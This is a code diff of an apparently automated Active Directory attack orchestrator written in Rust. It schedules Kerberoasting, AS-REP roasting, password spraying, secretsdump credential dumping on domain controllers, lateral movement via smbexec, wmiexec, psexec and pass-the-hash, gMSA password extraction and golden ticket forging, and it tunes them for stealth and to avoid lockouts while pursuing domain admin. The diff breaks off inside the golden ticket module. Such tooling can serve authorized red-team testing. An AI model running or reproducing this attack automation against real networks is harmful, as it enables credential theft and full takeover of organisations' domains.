.throttled_submit("credential_access", "credential_access", payload, 5) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, domain = %domain, "AS-REP roast dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_ASREP_DOMAINS, domain.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_ASREP_DOMAINS, &domain) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch AS-REP roast"), + } + } + + // --- Kerberoast: one per domain + credential pair --- + let kerberoast_work: Vec<(String, String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + state + .credentials + .iter() + .filter(|c| !c.domain.is_empty()) + // Skip delegation accounts — Kerberoast is already done with + // other creds, and burning auth on delegation accounts risks + // lockout before S4U can use them. + .filter(|c| !state.is_delegation_account(&c.username)) + // Skip quarantined credentials — locked out, retry after expiry. + .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) + .filter_map(|cred| { + let cred_domain = cred.domain.to_lowercase(); + let dedup = format!("krb:{}:{}", cred_domain, cred.username.to_lowercase()); + if state.is_processed(DEDUP_CRACK_REQUESTS, &dedup) { + return None; + } + // Exact domain match first + if let Some(dc_ip) = state.domain_controllers.get(&cred_domain).cloned() { + return Some((dedup, dc_ip, cred_domain, cred.clone())); + } + // Fallback: check child domains (e.g. cred has "contoso.local" + // but user is actually in "child.contoso.local") + let suffix = format!(".{cred_domain}"); + for (domain, dc_ip) in &state.domain_controllers { + if domain.ends_with(&suffix) { + debug!( + cred_domain = %cred_domain, + child_domain = %domain, + "Kerberoast: using child domain DC for parent-domain credential" + ); + return Some((dedup, dc_ip.clone(), domain.clone(), cred.clone())); + } + } + // Last resort: use target_ips[0] if DC map has no entry for this domain + if let Some(fallback_ip) = state.target_ips.first().cloned() { + debug!( + cred_domain = %cred_domain, + fallback_ip = %fallback_ip, + "Kerberoast: using target IP fallback (no DC in map)" + ); + return Some((dedup, fallback_ip, cred_domain, cred.clone())); + } + None + }) + .take(2) + .collect() + }; + + for (dedup_key, dc_ip, resolved_domain, cred) in kerberoast_work { + match dispatcher + .request_credential_access("kerberoast", &dc_ip, &resolved_domain, &cred, 5) + .await + { + Ok(Some(task_id)) => { + debug!(task_id = %task_id, domain = %resolved_domain, "Kerberoast dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_CRACK_REQUESTS, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_CRACK_REQUESTS, &dedup_key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch kerberoast"), + } + } + + // --- Password spray: username-as-password --- + let spray_work: Vec<(String, String, String)> = { + let state = dispatcher.state.read().await; + state + .users + .iter() + .filter(|u| !u.domain.is_empty()) + // Skip delegation accounts — their auth budget is reserved for + // S4U exploitation. Spraying them causes lockout before S4U fires. + .filter(|u| !state.is_delegation_account(&u.username)) + .filter(|u| !state.is_credential_quarantined(&u.username, &u.domain)) + .filter_map(|u| { + let user_domain = u.domain.to_lowercase(); + let dedup = format!("{}:{}", user_domain, u.username.to_lowercase()); + if state.is_processed(DEDUP_USERNAME_SPRAY, &dedup) { + return None; + } + // Exact match or child-domain fallback + let dc_ip = state + .domain_controllers + .get(&user_domain) + .cloned() + .or_else(|| { + let suffix = format!(".{user_domain}"); + state + .domain_controllers + .iter() + .find(|(d, _)| d.ends_with(&suffix)) + .map(|(_, ip)| ip.clone()) + })?; + Some((dedup, dc_ip, u.domain.clone())) + }) + .take(5) + .collect() + }; + + // Submit one spray task per domain (batched) + let mut sprayed_domains = std::collections::HashSet::new(); + for (_dedup_key, dc_ip, domain) in &spray_work { + if sprayed_domains.contains(domain) { + continue; + } + sprayed_domains.insert(domain.clone()); + + let payload = json!({ + "technique": "username_as_password", + "target_ip": dc_ip, + "domain": domain, + }); + + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, 4) + .await + { + Ok(Some(task_id)) => { + debug!(task_id = %task_id, domain = %domain, "Password spray dispatched"); + // Mark all users in this domain's batch as processed + for (dk, _, d) in &spray_work { + if d == domain { + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_USERNAME_SPRAY, dk.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_USERNAME_SPRAY, dk) + .await; + } + } + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch password spray"), + } + } + + // --- Low-hanging fruit: SYSVOL, GPP, LDAP descriptions, LAPS per new credential --- + // Mirrors Python's fast credential discovery — dispatches high-success-rate + // techniques that find hardcoded/stored passwords in Active Directory. + let low_hanging_work: Vec<(String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + state + .credentials + .iter() + .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) + // Skip delegation accounts — their auth is reserved for S4U. + .filter(|c| c.is_admin || !state.is_delegation_account(&c.username)) + .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) + .filter_map(|cred| { + let cred_domain = cred.domain.to_lowercase(); + let dedup = format!("{}:{}", cred_domain, cred.username.to_lowercase()); + if state.is_processed(DEDUP_LOW_HANGING, &dedup) { + return None; + } + // Find DC for this credential's domain + let dc_ip = state + .domain_controllers + .get(&cred_domain) + .cloned() + .or_else(|| { + let suffix = format!(".{cred_domain}"); + state + .domain_controllers + .iter() + .find(|(d, _)| d.ends_with(&suffix)) + .map(|(_, ip)| ip.clone()) + }) + .or_else(|| state.target_ips.first().cloned())?; + Some((dedup, dc_ip, cred.clone())) + }) + .take(2) // Max 2 per cycle + .collect() + }; + + for (dedup_key, dc_ip, cred) in low_hanging_work { + match dispatcher + .request_low_hanging_fruit(&dc_ip, &cred.domain, &cred, 4) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %cred.domain, + username = %cred.username, + "Low-hanging fruit credential discovery dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_LOW_HANGING, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_LOW_HANGING, &dedup_key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch low-hanging fruit"), + } + } + + // --- Secretsdump per new credential against same-domain hosts --- + // Dispatches secretsdump for new credentials against hosts in the same + // domain (or child/parent domains). Cross-domain attempts generate + // failed auths that trigger AD account lockout. + // Credentials may be local admin on member servers — secretsdump fails + // fast if not, but when it succeeds it's the fastest path to DA. + let sd_work: Vec<(String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + + // Skip if already DA + if state.has_domain_admin { + Vec::new() + } else { + let mut items = Vec::new(); + for cred in state + .credentials + .iter() + .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) + // Skip delegation accounts — secretsdump will always fail + // (they're not admin) and burns auth budget needed for S4U. + .filter(|c| c.is_admin || !state.is_delegation_account(&c.username)) + .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) + { + let cred_domain = cred.domain.to_lowercase(); + for host in &state.hosts { + // Resolve host domain: prefer hostname FQDN, fall back + // to domain_controllers map for bare-IP hosts. + let host_domain = { + let from_hostname = host + .hostname + .to_lowercase() + .split_once('.') + .map(|x| x.1) + .unwrap_or("") + .to_string(); + if from_hostname.is_empty() { + // Check if this IP is a known DC + state + .domain_controllers + .iter() + .find(|(_, ip)| ip.as_str() == host.ip) + .map(|(d, _)| d.to_lowercase()) + .unwrap_or_default() + } else { + from_hostname + } + }; + // Only target same-domain hosts. Skip unknown-domain + // hosts — they'll be retried next cycle after nmap + // populates hostnames. + if host_domain.is_empty() + || (host_domain != cred_domain + && !host_domain.ends_with(&format!(".{cred_domain}")) + && !cred_domain.ends_with(&format!(".{host_domain}"))) + { + continue; + } + + let dedup = format!( + "{}:{}:{}", + host.ip, + cred_domain, + cred.username.to_lowercase() + ); + if !state.is_processed(DEDUP_SECRETSDUMP, &dedup) { + items.push((dedup, host.ip.clone(), cred.clone())); + } + } + } + items.into_iter().take(5).collect() // Max 5 per cycle + } + }; + + for (dedup_key, target_ip, cred) in sd_work { + let priority = if cred.is_admin { 2 } else { 7 }; + match dispatcher + .request_secretsdump(&target_ip, &cred, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %target_ip, + username = %cred.username, + "Credential secretsdump dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SECRETSDUMP, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SECRETSDUMP, &dedup_key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch credential secretsdump"), + } + } + + // --- Common password spray: per domain when no admin creds found yet --- + // Keep spraying common passwords until we find admin or achieve DA. + let common_spray_work: Vec<(String, String)> = { + let state = dispatcher.state.read().await; + if state.has_domain_admin || state.credentials.iter().any(|c| c.is_admin) { + // Already have admin creds or DA — skip common spray + Vec::new() + } else { + state + .domain_controllers + .iter() + .filter(|(domain, _)| { + let key = format!("common:{}", domain.to_lowercase()); + !state.is_processed(DEDUP_PASSWORD_SPRAY, &key) + }) + // Only spray after initial recon (AS-REP) has completed. + // This prevents spraying in the first cycle when Kerberoast + // hasn't had time to collect hashes yet. + .filter(|(domain, _)| { + state.is_processed(DEDUP_ASREP_DOMAINS, domain) + || state.is_processed(DEDUP_ASREP_DOMAINS, &domain.to_lowercase()) + }) + // Only spray after delegation enumeration has dispatched for + // at least one credential in this domain. Spraying before + // delegation can lock out accounts and prevent find_delegation + // from using valid credentials. + .filter(|(domain, _)| { + let prefix = format!("{}:", domain.to_lowercase()); + state.has_processed_prefix(DEDUP_DELEGATION_CREDS, &prefix) + }) + // Skip domains with UNCRACKED Kerberoast hashes — + // offline cracking is safer (no lockout risk) and handles + // complex passwords that spray would never find. + // Once all hashes are cracked (or none exist), spray proceeds + // as a fallback path for accounts without SPNs. + .filter(|(domain, _)| { + let d = domain.to_lowercase(); + !state.hashes.iter().any(|h| { + h.hash_type.to_lowercase().contains("kerberoast") + && h.domain.to_lowercase() == d + && h.cracked_password.is_none() + }) + }) + .map(|(domain, dc_ip)| (domain.clone(), dc_ip.clone())) + .collect() + } + }; + + for (domain, dc_ip) in common_spray_work { + let payload = json!({ + "techniques": ["password_spray", "username_as_password"], + "reason": "low_hanging_fruit", + "target_ip": dc_ip, + "domain": domain, + "use_common_passwords": true, + }); + + // Mark as processed BEFORE submitting to prevent duplicate deferred entries. + // The task will be dispatched or deferred regardless. + let key = format!("common:{}", domain.to_lowercase()); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_PASSWORD_SPRAY, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_PASSWORD_SPRAY, &key) + .await; + + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, 3) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, domain = %domain, "Common password spray dispatched"); + } + Ok(None) => { + debug!(domain = %domain, "Common password spray deferred"); + } + Err(e) => warn!(err = %e, "Failed to dispatch common password spray"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/credential_expansion.rs b/ares-cli/src/orchestrator/automation/credential_expansion.rs new file mode 100644 index 00000000..e1b70c68 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/credential_expansion.rs @@ -0,0 +1,410 @@ +//! auto_credential_expansion -- test new credentials across discovered hosts. +//! +//! When new credentials arrive, this automation tries lateral movement +//! (smbexec, wmiexec, psexec) against non-owned hosts. It also tries +//! secretsdump on DCs for ALL credentials (not just admin — the credential +//! access agent determines feasibility). + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::debug; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Lateral movement techniques to try, in order of stealth preference. +const LATERAL_TECHNIQUES: &[&str] = &["smbexec", "wmiexec", "psexec"]; + +/// Monitors for new credentials and dispatches lateral movement + secretsdump. +/// Interval: 15s. Enhanced version of the original auto_credential_expansion. +pub async fn auto_credential_expansion( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(15)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + + // Skip if already domain admin + if state.has_domain_admin { + continue; + } + + state + .credentials + .iter() + .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) + // Skip delegation accounts — their auth is reserved for S4U. + .filter(|c| c.is_admin || !state.is_delegation_account(&c.username)) + // Skip quarantined credentials — locked out, retry after expiry. + .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) + .filter_map(|cred| { + let dedup = format!( + "{}:{}", + cred.domain.to_lowercase(), + cred.username.to_lowercase() + ); + if state.is_processed(DEDUP_EXPANSION_CREDS, &dedup) { + return None; + } + + // Collect non-owned host IPs in the same domain (or child + // domains). Cross-domain lateral attempts with wrong-domain + // creds generate failed auth that triggers AD lockout. + // Domain is extracted from hostname (e.g., + // dc02.child.contoso.local → child.contoso.local). + // Resolve NetBIOS domain names (e.g. "CHILD") to FQDN + // via the netbios_to_fqdn map before matching. + let cred_dom = { + let raw = cred.domain.to_lowercase(); + if !raw.contains('.') { + state + .netbios_to_fqdn + .get(&raw) + .or_else(|| state.netbios_to_fqdn.get(&cred.domain.to_uppercase())) + .map(|fqdn| fqdn.to_lowercase()) + .unwrap_or(raw) + } else { + raw + } + }; + let targets: Vec = state + .hosts + .iter() + .filter(|h| !h.owned) + .filter(|h| { + // Resolve host domain: prefer hostname FQDN, fall + // back to domain_controllers map for bare-IP hosts. + let host_domain = { + let from_hostname = h + .hostname + .to_lowercase() + .split_once('.') + .map(|x| x.1) + .unwrap_or("") + .to_string(); + if from_hostname.is_empty() { + state + .domain_controllers + .iter() + .find(|(_, ip)| ip.as_str() == h.ip) + .map(|(d, _)| d.to_lowercase()) + .unwrap_or_default() + } else { + from_hostname + } + }; + // Skip unknown-domain hosts — retry next cycle + // after nmap populates hostnames. + !host_domain.is_empty() + && (host_domain == cred_dom + || host_domain.ends_with(&format!(".{cred_dom}")) + || cred_dom.ends_with(&format!(".{host_domain}"))) + }) + .map(|h| h.ip.clone()) + .collect(); + + if targets.is_empty() { + return None; + } + + // Find DCs for this credential's domain (for secretsdump). + // Also include child-domain DCs — parent creds are valid in child domains. + // Reuse resolved cred_dom (already NetBIOS→FQDN resolved). + let cred_domain = cred_dom.clone(); + let dc_ips: Vec = state + .domain_controllers + .iter() + .filter(|(domain, _)| { + let d = domain.to_lowercase(); + d == cred_domain || d.ends_with(&format!(".{cred_domain}")) + }) + .map(|(_, ip)| ip.clone()) + .collect(); + + Some(ExpansionWork { + dedup_key: dedup, + credential: cred.clone(), + targets, + dc_ips, + is_admin: cred.is_admin, + }) + }) + .take(3) // Process max 3 new creds per cycle + .collect() + }; + + for item in work { + let mut any_dispatched = false; + + // 1. Try secretsdump on DCs FIRST — this is the highest-value op + // for a new credential. Must run before lateral movement to avoid + // burning CredentialInflight slots on lower-value tasks. + // Admin creds get priority 2; non-admin get priority 3 (higher + // than lateral at 5) since secretsdump is the fastest path to + // krbtgt → DA → golden ticket. + for dc_ip in &item.dc_ips { + let sd_dedup = format!( + "{}:{}:{}", + dc_ip, + item.credential.domain.to_lowercase(), + item.credential.username.to_lowercase() + ); + let already_dumped = { + let state = dispatcher.state.read().await; + state.is_processed(DEDUP_SECRETSDUMP, &sd_dedup) + }; + + if !already_dumped { + let priority = if item.is_admin { 2 } else { 3 }; + if let Ok(Some(task_id)) = dispatcher + .request_secretsdump(dc_ip, &item.credential, priority) + .await + { + any_dispatched = true; + debug!( + task_id = %task_id, + dc = %dc_ip, + is_admin = item.is_admin, + "Credential secretsdump dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SECRETSDUMP, sd_dedup.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SECRETSDUMP, &sd_dedup) + .await; + } + } + } + + // 2. Try lateral movement on non-DC hosts (up to 5 targets). + // Runs after secretsdump so the high-value op gets credential + // inflight slots first. + let technique = LATERAL_TECHNIQUES[0]; // Start with smbexec + for target_ip in item.targets.iter().take(5) { + if let Ok(Some(task_id)) = dispatcher + .request_lateral(target_ip, &item.credential, technique) + .await + { + any_dispatched = true; + debug!( + task_id = %task_id, + target = %target_ip, + technique = technique, + username = %item.credential.username, + "Credential expansion lateral dispatched" + ); + } + } + + // Only mark as processed if at least one task was actually dispatched. + // If all tasks were throttled/deferred, retry next cycle. + if any_dispatched { + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_EXPANSION_CREDS, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_EXPANSION_CREDS, &item.dedup_key) + .await; + } + } + + // 3. Try hashes for pass-the-hash lateral movement + let hash_work: Vec = { + let state = dispatcher.state.read().await; + + if state.has_domain_admin { + continue; + } + + state + .hashes + .iter() + .filter(|h| { + h.hash_type.to_lowercase() == "ntlm" + && !h.domain.is_empty() + && h.username.to_lowercase() != "krbtgt" + && !h.username.ends_with('$') + }) + .filter_map(|hash| { + let dedup = format!( + "{}:{}:{}", + hash.domain.to_lowercase(), + hash.username.to_lowercase(), + &hash.hash_value[..32.min(hash.hash_value.len())] + ); + if state.is_processed(DEDUP_HASH_LATERAL, &dedup) { + return None; + } + + let targets: Vec = state + .hosts + .iter() + .filter(|h| !h.owned) + .map(|h| h.ip.clone()) + .collect(); + + if targets.is_empty() { + return None; + } + + Some(HashExpansionWork { + dedup_key: dedup, + hash: hash.clone(), + targets, + }) + }) + .take(2) + .collect() + }; + + for item in hash_work { + let mut dc_sd_dispatched = false; + + // Build a credential-like object for pass-the-hash + let pth_cred = ares_core::models::Credential { + id: format!("pth_{}", item.hash.username), + username: item.hash.username.clone(), + password: item.hash.hash_value.clone(), + domain: item.hash.domain.clone(), + source: "hash_pth".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + + for target_ip in item.targets.iter().take(3) { + if let Ok(Some(task_id)) = dispatcher + .request_lateral(target_ip, &pth_cred, "pth_smbclient") + .await + { + debug!( + task_id = %task_id, + target = %target_ip, + username = %item.hash.username, + "Hash-based lateral dispatched" + ); + } + } + + // 4. Hash→secretsdump: try pass-the-hash secretsdump against DCs. + // This is the fastest path from hash → krbtgt → DA. + { + let state = dispatcher.state.read().await; + let dc_ips: Vec = state.domain_controllers.values().cloned().collect(); + drop(state); + + for dc_ip in dc_ips { + let sd_dedup = format!( + "{}:{}:{}", + dc_ip, + item.hash.domain.to_lowercase(), + item.hash.username.to_lowercase() + ); + let already = { + let state = dispatcher.state.read().await; + state.is_processed(DEDUP_SECRETSDUMP, &sd_dedup) + }; + if !already { + if let Ok(Some(task_id)) = + dispatcher.request_secretsdump(&dc_ip, &pth_cred, 2).await + { + dc_sd_dispatched = true; + debug!( + task_id = %task_id, + dc = %dc_ip, + username = %item.hash.username, + "Hash-based secretsdump dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SECRETSDUMP, sd_dedup.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SECRETSDUMP, &sd_dedup) + .await; + } + } + } + } + + // Only mark as fully processed once DC secretsdump has been dispatched. + // PTH lateral alone is not sufficient — the critical path is hash→DC→krbtgt. + if dc_sd_dispatched { + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_HASH_LATERAL, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_HASH_LATERAL, &item.dedup_key) + .await; + } + } + } +} + +struct ExpansionWork { + dedup_key: String, + credential: ares_core::models::Credential, + targets: Vec, + dc_ips: Vec, + is_admin: bool, +} + +struct HashExpansionWork { + dedup_key: String, + hash: ares_core::models::Hash, + targets: Vec, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_lateral_techniques_order() { + // smbexec first (stealthiest), then wmiexec, then psexec + assert_eq!(LATERAL_TECHNIQUES[0], "smbexec"); + assert_eq!(LATERAL_TECHNIQUES[1], "wmiexec"); + assert_eq!(LATERAL_TECHNIQUES[2], "psexec"); + } + + #[test] + fn test_lateral_techniques_count() { + assert_eq!(LATERAL_TECHNIQUES.len(), 3); + } + + #[test] + fn test_lateral_techniques_contains() { + assert!(LATERAL_TECHNIQUES.contains(&"smbexec")); + assert!(LATERAL_TECHNIQUES.contains(&"wmiexec")); + assert!(LATERAL_TECHNIQUES.contains(&"psexec")); + assert!(!LATERAL_TECHNIQUES.contains(&"evil-winrm")); + } +} diff --git a/ares-cli/src/orchestrator/automation/delegation.rs b/ares-cli/src/orchestrator/automation/delegation.rs new file mode 100644 index 00000000..6d2672de --- /dev/null +++ b/ares-cli/src/orchestrator/automation/delegation.rs @@ -0,0 +1,103 @@ +//! auto_delegation_enumeration -- find delegation for new creds. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::{debug, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Dispatches delegation enumeration for new credentials. +/// Interval: 30s. Matches Python `_auto_delegation_enumeration`. +pub async fn auto_delegation_enumeration( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let notify = dispatcher.delegation_notify.clone(); + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = notify.notified() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let work: Vec<(String, String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + state + .credentials + .iter() + // Skip delegation accounts — delegation enum is already done + // with other creds, and using a delegation account's cred + // burns auth budget reserved for S4U. + .filter(|c| !state.is_delegation_account(&c.username)) + .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) + .filter_map(|cred| { + if cred.domain.is_empty() { + return None; + } + let cred_domain = cred.domain.to_lowercase(); + let dedup = format!("{}:{}", cred_domain, cred.username.to_lowercase()); + if state.is_processed(DEDUP_DELEGATION_CREDS, &dedup) { + return None; + } + // Exact match first + let dc_ip = state + .domain_controllers + .get(&cred_domain) + .cloned() + .or_else(|| { + // Child-domain fallback: cred domain is parent, + // DC is registered under child (e.g. cred=contoso.local, + // DC=child.contoso.local) + let suffix = format!(".{cred_domain}"); + state + .domain_controllers + .iter() + .find(|(d, _)| d.ends_with(&suffix)) + .map(|(_, ip)| ip.clone()) + }) + .or_else(|| { + // Parent-domain fallback: cred domain is child, + // DC is registered under parent + state + .domain_controllers + .iter() + .find(|(d, _)| cred_domain.ends_with(&format!(".{d}"))) + .map(|(_, ip)| ip.clone()) + })?; + Some((dedup, cred.domain.clone(), dc_ip, cred.clone())) + }) + .collect() + }; + + for (dedup_key, domain, dc_ip, cred) in work { + match dispatcher + .request_delegation_enum(&domain, &dc_ip, &cred) + .await + { + Ok(Some(task_id)) => { + debug!(task_id = %task_id, domain = %domain, "Delegation enumeration dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_DELEGATION_CREDS, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_DELEGATION_CREDS, &dedup_key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch delegation enumeration"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/gmsa.rs b/ares-cli/src/orchestrator/automation/gmsa.rs new file mode 100644 index 00000000..615ab6bc --- /dev/null +++ b/ares-cli/src/orchestrator/automation/gmsa.rs @@ -0,0 +1,145 @@ +//! auto_gmsa_extraction -- dump gMSA passwords when gMSA accounts are found. +//! +//! Group Managed Service Accounts (gMSA) store their passwords in Active +//! Directory in the `msDS-ManagedPassword` attribute. Any principal with read +//! access can retrieve the plaintext password. When we discover users whose +//! names end with `$` and whose descriptions mention "managed service account" +//! (or via BloodHound gMSA edges), we dispatch `gmsa_dump_passwords`. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Monitors for gMSA accounts and dispatches password extraction. +/// Interval: 30s. +pub async fn auto_gmsa_extraction( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + + // Need at least one credential to query AD for gMSA passwords + if state.credentials.is_empty() { + continue; + } + + // Find gMSA-like accounts from discovered users + let gmsa_accounts: Vec = state + .users + .iter() + .filter_map(|user| { + // gMSA accounts typically end with $ and have "managed service" + // in description, or their name contains "gmsa" / "msds" + let is_gmsa = user.username.ends_with('$') + && (user.description.to_lowercase().contains("managed service") + || user.username.to_lowercase().contains("gmsa")); + + if !is_gmsa { + return None; + } + + let dedup_key = format!( + "{}:{}", + user.domain.to_lowercase(), + user.username.to_lowercase() + ); + if state.is_processed(DEDUP_GMSA_ACCOUNTS, &dedup_key) { + return None; + } + + // Find a credential we can use to query this domain + let cred = state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == user.domain.to_lowercase())?; + + let dc_ip = state + .domain_controllers + .get(&user.domain.to_lowercase()) + .cloned()?; + + Some(GmsaWork { + dedup_key, + gmsa_account: user.username.clone(), + domain: user.domain.clone(), + dc_ip, + credential: cred.clone(), + }) + }) + .collect(); + + gmsa_accounts + }; + + for item in work { + let payload = json!({ + "technique": "gmsa_dump_passwords", + "target_ip": item.dc_ip, + "domain": item.domain, + "gmsa_account": item.gmsa_account, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, 3) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + gmsa_account = %item.gmsa_account, + domain = %item.domain, + "gMSA password dump dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_GMSA_ACCOUNTS, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_GMSA_ACCOUNTS, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(gmsa = %item.gmsa_account, "gMSA task deferred by throttler"); + } + Err(e) => { + warn!(err = %e, gmsa = %item.gmsa_account, "Failed to dispatch gMSA dump") + } + } + } + } +} + +struct GmsaWork { + dedup_key: String, + gmsa_account: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} diff --git a/ares-cli/src/orchestrator/automation/golden_ticket.rs b/ares-cli/src/orchestrator/automation/golden_ticket.rs new file mode 100644 index 00000000..d58b7372 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/golden_ticket.rs @@ -0,0 +1,295 @@ +//! auto_golden_ticket -- monitor for krbtgt hash and forge golden ticket. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; + +/// Monitors for krbtgt hash and triggers golden ticket forging. +/// Interval: 30s. Matches Python `_auto_golden_ticket`. +pub async fn auto_golden_ticket(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let state = dispatcher.state.read().await; + + // Skip if already have golden ticket + if state.has_golden_ticket { + continue; + } + + // Skip if no domain admin yet + if !state.has_domain_admin { + continue; + } + + // Look for krbtgt hash + let krbtgt_hash = state + .hashes + .iter() + .find(|h| h.username.to_lowercase() == "krbtgt"); + + let krbtgt = match krbtgt_hash { + Some(h) => h.clone(), + None => continue, + }; + + let domain = if !krbtgt.domain.is_empty() { + krbtgt.domain.clone() + } else { + match state.domains.first() { + Some(d) => d.clone(), + None => continue, + } + }; + + // Domain SID: prefer cached value, resolve via lookupsid if missing. + let mut domain_sid = state.domain_sids.get(&domain.to_lowercase()).cloned(); + + // Look up a DC IP for this domain + let dc_ip = state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned(); + + // Find the best credential for the domain: prefer plaintext, fall back to NTLM hash. + let admin_cred = state + .credentials + .iter() + .find(|c| { + c.username.to_lowercase() == "administrator" + && c.domain.to_lowercase() == domain.to_lowercase() + }) + .cloned(); + let admin_hash = state + .hashes + .iter() + .find(|h| { + h.username.to_lowercase() == "administrator" + && h.domain.to_lowercase() == domain.to_lowercase() + && h.hash_type.to_uppercase() == "NTLM" + }) + .cloned(); + + // Collect a password credential for SID lookup (any domain user will do). + // Prefer a cred from the target domain, but fall back to any valid cred + // since NTLM cross-domain auth works for lookupsid via trust relationships. + let lookup_cred = state + .credentials + .iter() + .find(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + state.credentials.iter().find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) + .cloned(); + + drop(state); + + // ── Resolve domain SID if not cached ──────────────────────────── + if domain_sid.is_none() { + if let Some(ref target_ip) = dc_ip { + let result = resolve_domain_sid( + &domain, + target_ip, + lookup_cred.as_ref(), + admin_hash.as_ref(), + ) + 